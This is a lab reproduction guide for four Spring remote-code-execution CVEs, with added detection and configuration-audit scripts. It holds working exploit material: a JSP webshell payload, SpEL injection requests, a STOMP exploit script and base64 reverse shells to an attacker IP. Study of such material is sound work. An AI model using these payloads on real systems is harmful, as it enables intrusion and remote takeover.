Spring Framework Vulnerability Analysis and Reproduction Guide
Table of Contents
- Spring Framework Remote Code Execution (CVE-2022-22965)
- Spring Cloud Gateway Remote Code Execution (CVE-2022-22947)
- Spring Data Commons Remote Command Execution (CVE-2018-1273)
- Spring Messaging Remote Command Execution (CVE-2018-1270)
Spring Framework Remote Code Execution (CVE-2022-22965)
Vulnerability Overview
This vulnerability (CVE-2022-22965) arises because Java 9 introduced the class.module.classLoader property, which makes it possible to bypass the patch for CVE-2010-1622. JDK 9 contains classes that slip past the blacklist the earlier fix relied on, and that is what leads to this vulnerability.
Lab Environment
- Attacker: Kali Linux (192.168.200.14)
- Target: Ubuntu (192.168.200.47)
- Platform: Vulhub
Reproduction Steps
- Prepare the environment

```shell
cd /vulhub/spring/CVE-2022-22965
docker-compose up -d
```

- Access the target

http://192.168.200.47:8080

- Build the payload that rewrites Tomcat's access-log configuration

Send the following GET request to change Apache Tomcat's access-log settings so that the log file is written out as a JSP file:

```http
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.200.147:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
```

- Access the webshell and run a command

http://192.168.200.47:8080/tomcatwar.jsp?pwd=j&cmd=id

Remediation
- Upgrade Spring Framework to a patched version
- Restrict access to dangerous classes
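On the detection side, the request above leaves a very recognisable trace: parameter names that descend through class.module.classLoader (or the older class.classLoader path from CVE-2010-1622) and end in an AccessLogValve attribute such as suffix or directory. The following Python script, added here as an example and not part of the original guide or of Vulhub, scans access-log lines for that pattern. The log lines are constructed to resemble Apache/Tomcat combined-format entries and borrow only the parameter names and the webshell path shown on this page.

```python
"""Flag CVE-2022-22965 style ClassLoader property binding in HTTP access logs.

Added example for this guide; it is not part of the original page or of Vulhub.
The log lines below are constructed in Apache/Tomcat combined format.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter-name prefixes that reach the ClassLoader through the `class` property:
# class.classLoader (CVE-2010-1622) and class.module.classLoader (the Java 9 path
# used by CVE-2022-22965). Matched case-insensitively.
SUSPICIOUS_PREFIXES = ("class.module.classloader", "class.classloader")

# AccessLogValve attributes set by the published payload: seeing one of these as the
# leaf of a ClassLoader path means the request is trying to redirect Tomcat's log file.
VALVE_ATTRIBUTES = {"pattern", "suffix", "directory", "prefix", "filedateformat"}

# Combined-log-format request part: "METHOD target HTTP/x.y" status
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample: one payload request, the follow-up webshell fetch and a normal request.
SAMPLE_LOG = [
    '192.168.200.14 - - [10/Apr/2022:10:01:02 +0000] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT HTTP/1.1" 200 512',
    '192.168.200.14 - - [10/Apr/2022:10:01:05 +0000] "GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1" 200 128',
    '10.0.0.5 - - [10/Apr/2022:10:02:00 +0000] "GET /users?page=0&size=5 HTTP/1.1" 200 2048',
]


def analyze_request_target(target):
    """Return findings for one request target (path plus query string)."""
    findings = []
    query = urlsplit(target).query
    for name, _value in parse_qsl(query, keep_blank_values=True):
        lowered = name.lower()
        if lowered.startswith(SUSPICIOUS_PREFIXES):
            leaf = lowered.rsplit(".", 1)[-1]
            severity = "high" if leaf in VALVE_ATTRIBUTES else "medium"
            findings.append({"param": name, "severity": severity})
    return findings


def scan_access_log(lines):
    """Return (line_number, status, findings) for every line that binds into a ClassLoader path."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        match = LOG_RE.search(line)
        if not match:
            continue
        findings = analyze_request_target(match.group("target"))
        if findings:
            hits.append((lineno, int(match.group("status")), findings))
    return hits


if __name__ == "__main__":
    for lineno, status, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: HTTP {status}, {len(findings)} suspicious parameter(s)")
        for f in findings:
            print(f"  [{f['severity']}] {f['param']}")
```

Two caveats when running this against real logs. The payload can equally arrive in a POST body, which access logs do not record, so the same check belongs in a WAF or at the application layer. And the attack rewrites the AccessLogValve pattern itself, so the Tomcat log file on the victim stops being a normal log the moment the request succeeds; inspect logs captured by a reverse proxy or a central collector rather than the file on the affected host.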
Spring Cloud Gateway Remote Code Execution (CVE-2022-22947)
Vulnerability Overview
Spring Cloud Gateway provides a library for building API gateways on top of Spring WebFlux. In versions prior to 3.1.0 and 3.0.6, an application is vulnerable to code injection when the Gateway Actuator endpoint is enabled, exposed and left unsecured; a remote attacker can execute arbitrary code by sending a crafted request.
Lab Environment
- Attacker: Kali Linux (192.168.200.14)
- Target: Ubuntu (192.168.200.47)
- Platform: Vulhub
Reproduction Steps
- Prepare the environment

```shell
cd /vulhub/spring/CVE-2022-22947
docker-compose up -d
```

- Create a malicious route

Send a POST request that adds a route containing a malicious SpEL expression:

```http
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.200.47:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 310

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}
```

- Refresh the routes to trigger execution

```http
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.200.47:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

- Read the result

```http
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.200.47:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

- Clean up

```http
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.200.47:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
```

Remediation
- Upgrade Spring Cloud Gateway to 3.1.0+ or 3.0.6+
- Disable or protect the Actuator endpoints
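The whole chain above depends on /actuator/gateway being reachable, which is a configuration decision rather than a code bug. The script below, added here as an example and not part of the original guide or of Spring Cloud Gateway, audits a Spring Boot application.properties fragment and reports whether the gateway actuator is exposed over HTTP. The two property fragments are constructed; the keys they use (management.endpoints.web.exposure.include, management.endpoints.web.exposure.exclude and management.endpoint.gateway.enabled) are real Spring Boot and Spring Cloud Gateway properties.

```python
"""Check whether a Spring Boot configuration exposes the Gateway actuator endpoint.

Added example for this guide; not part of the original page or of Spring Cloud Gateway.
The two application.properties fragments below are constructed. Property keys used are
real Spring Boot / Spring Cloud Gateway keys: management.endpoints.web.exposure.include,
management.endpoints.web.exposure.exclude and management.endpoint.gateway.enabled.
"""

# Constructed: the setting that makes /actuator/gateway/routes reachable, as in the lab.
WEAK_CONFIG = """
# expose every actuator endpoint over HTTP (what the vulnerable lab relies on)
management.endpoints.web.exposure.include=*
"""

# Constructed: the hardened counterpart. Upgrading to 3.0.6 / 3.1.0 is still the fix;
# this only removes the reachable sink.
HARDENED_CONFIG = """
management.endpoints.web.exposure.include=health
management.endpoint.gateway.enabled=false
"""


def parse_properties(text):
    """Minimal .properties parser: key=value or key: value, '#' and '!' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        sep = "=" if "=" in line else ":"
        key, _, value = line.partition(sep)
        props[key.strip()] = value.strip()
    return props


def _csv(value):
    return {item.strip() for item in value.split(",") if item.strip()}


def gateway_actuator_exposed(props):
    """True when the gateway endpoint is enabled and exposed over the web."""
    # The gateway endpoint is enabled unless explicitly turned off.
    if props.get("management.endpoint.gateway.enabled", "true").strip().lower() != "true":
        return False
    # Spring Boot's web exposure default is "health" (older 2.x releases also listed "info");
    # "*" selects every endpoint, and exclude takes precedence over include.
    include = _csv(props.get("management.endpoints.web.exposure.include", "health"))
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    if "*" in exclude or "gateway" in exclude:
        return False
    return "*" in include or "gateway" in include


def audit(text):
    """Return a short verdict for a properties fragment."""
    exposed = gateway_actuator_exposed(parse_properties(text))
    return "EXPOSED: /actuator/gateway reachable over HTTP" if exposed else "ok: gateway actuator not exposed"


if __name__ == "__main__":
    print("weak config     ->", audit(WEAK_CONFIG))
    print("hardened config ->", audit(HARDENED_CONFIG))
```

Where routes genuinely have to be managed at runtime and the endpoint cannot be disabled, it still needs authentication and should be bound to a management port that is not reachable from the networks the gateway serves; the audit only tells you whether the sink is reachable at all.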
Spring Data Commons Remote Command Execution (CVE-2018-1273)
Vulnerability Overview
Spring Data Commons is the shared foundation used by all Spring Data sub-projects. Versions 2.0.5 and earlier contain a SpEL expression injection vulnerability: an attacker can inject a malicious SpEL expression to execute arbitrary commands.
Lab Environment
- Attacker: Kali Linux (192.168.200.14)
- Target: Ubuntu (192.168.200.47)
- Platform: Vulhub
Reproduction Steps
- Prepare the environment

```shell
cd /vulhub/spring/CVE-2018-1273
docker-compose up -d
```

- Open the user registration page

http://192.168.200.47:8080/users

- Send the malicious POST request

```http
POST /users?page=&size=5 HTTP/1.1
Host: 192.168.200.47:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
```

- Verify that the command ran

```shell
docker compose exec spring bash
ls /tmp/success
```

- Reverse shell (optional)

Use a base64-encoded reverse-shell command:

```shell
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xNC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
```

Remediation
- Upgrade Spring Data Commons to 2.0.6+
- Filter user input strictly
Spring Messaging Remote Command Execution (CVE-2018-1270)
Vulnerability Overview
The spring-messaging module of the Spring Framework provides an implementation of the STOMP protocol over WebSocket. The STOMP message broker is vulnerable to SpEL expression injection when it processes client messages, so an attacker can achieve remote code execution by crafting a malicious message.
Lab Environment
- Attacker: Kali Linux (192.168.200.14)
- Target: Ubuntu (192.168.200.47)
- Platform: Vulhub
Reproduction Steps
- Prepare the environment

```shell
cd /vulhub/spring/CVE-2018-1270
docker-compose up -d
```

- Run the exploit script with Python 3

The key part of the script is shown below. It talks to the SockJS endpoint over plain HTTP (the htmlfile transport for the receive side, xhr_send for the send side), frames each STOMP message by hand, and puts the SpEL expression in the selector header of the SUBSCRIBE frame:

```python
#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)


def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    """Minimal SockJS client: a background thread keeps the receive channel open."""

    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # SockJS session URL: <endpoint>/<server id>/<session id>
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time() * 1000)

    def run(self):
        # Receive side: the htmlfile transport is a long-lived streaming response.
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)

    def send(self, command, headers, body=''):
        # Build a STOMP frame: COMMAND, header lines, blank line, body, NUL terminator,
        # then wrap it in a JSON array as the SockJS xhr_send transport expects.
        data = [command.upper(), '\n']
        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])
        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://192.168.200.47:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
# The selector header is evaluated as SpEL by the broker; this is the injection point.
sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xNC84ODk5IDA+JjE=}|{base64,-d}|{bash,-i}')",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

# A message to /app/hello is broadcast to /topic/greetings, which evaluates the selector.
data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)
```

- Listen for the reverse shell

```shell
nc -lvnp 8899
```

Remediation
- Upgrade Spring Framework to 5.0.5+
- Disable STOMP endpoints that are not needed
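Both SpEL injections on this page arrive through fields that legitimately carry text: CVE-2018-1273 puts the expression in a form parameter name (username[...]) and CVE-2018-1270 puts it in the selector header of a STOMP SUBSCRIBE frame. The script below, added here as an example and not part of the original guide or of the Spring projects, shows the two checks a defender can apply on the server or at a proxy: a strict allowlist for what a property path may look like, and a scan of header values for the SpEL constructs (type references, #this, reflection, constructors) that are required to reach arbitrary code but never appear in a legitimate selector such as headers.type == 'greeting'. The form body and the STOMP frame are constructed and use harmless expressions.

```python
"""Spot SpEL injection attempts in form field names and STOMP frame headers.

Added example for this guide; not part of the original page or of the Spring projects.
CVE-2018-1273 carried its expression in a form parameter *name* (username[...]) and
CVE-2018-1270 in the STOMP SUBSCRIBE 'selector' header, so both inputs are checked here.
The form body and STOMP frame below are constructed and use harmless expressions.
"""
import re
from urllib.parse import parse_qsl

# What a data binder should accept as a property path: dotted identifiers with optional
# numeric indices, e.g. "username", "address.city", "roles[0]". Anything else is rejected.
SAFE_PROPERTY_PATH = re.compile(r"^[A-Za-z_]\w*(\[\d+\])?(\.[A-Za-z_]\w*(\[\d+\])?)*$")

# SpEL constructs needed to reach arbitrary code; legitimate selectors compare headers
# and never need them.
SPEL_INDICATORS = (
    re.compile(r"\bT\s*\("),             # type reference, e.g. T(java.lang.Runtime)
    re.compile(r"#this\b|#root\b"),      # evaluation-context root object
    re.compile(r"\.getClass\s*\("),      # reflective climb to Class / ClassLoader
    re.compile(r"\bforName\s*\("),
    re.compile(r"\bnew\s+[\w.]+\s*\("),  # constructor invocation
    re.compile(r"\bexec\s*\("),
)

# Constructed sample inputs.
FORM_BODY = "username[T(java.lang.System).getProperty('os.name')]=&password=&repeatedPassword="
STOMP_FRAME = (
    "SUBSCRIBE\n"
    "id:sub-0\n"
    "destination:/topic/greetings\n"
    "selector:T(java.lang.System).getProperty('user.name') != null\n"
    "\n\x00"
)


def is_safe_property_path(name):
    return bool(SAFE_PROPERTY_PATH.match(name))


def spel_indicators(text):
    """Return the indicator patterns found in text (empty list when clean)."""
    return [p.pattern for p in SPEL_INDICATORS if p.search(text)]


def audit_form_body(body):
    """Return parameter names a Spring Data style binder should refuse to bind."""
    return [name for name, _ in parse_qsl(body, keep_blank_values=True)
            if not is_safe_property_path(name) or spel_indicators(name)]


def parse_stomp_frame(frame):
    """Split one STOMP frame into (command, headers, body); the NUL terminator is dropped."""
    head, _, body = frame.partition("\n\n")
    command, *header_lines = head.split("\n")
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key] = value
    return command, headers, body.rstrip("\x00")


def audit_stomp_frame(frame):
    """Return header names whose values carry SpEL indicators ('selector' is the CVE-2018-1270 sink)."""
    _, headers, _ = parse_stomp_frame(frame)
    return [key for key, value in headers.items() if spel_indicators(value)]


if __name__ == "__main__":
    print("form parameters to reject:", audit_form_body(FORM_BODY))
    print("STOMP headers with SpEL indicators:", audit_stomp_frame(STOMP_FRAME))
```

The allowlist is the stronger of the two controls: a binder that only accepts identifier-shaped property paths never hands attacker text to the expression evaluator at all. The indicator scan is a detection aid for proxies and log pipelines, and the patched releases named above remain the actual fix.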
Summary
This article has analysed four high-severity vulnerabilities in the Spring ecosystem, covering their root causes, reproduction steps and remediation. All four allow a remote attacker to execute arbitrary code and are therefore extremely dangerous. Security recommendations:
- Update the Spring Framework and related components promptly to the latest patched versions
- Disable features and endpoints that are not needed
- Filter and validate user input strictly
- Run applications with the least privilege they need
In production, perform security assessments and vulnerability scans regularly to make sure systems are not exposed to known vulnerabilities.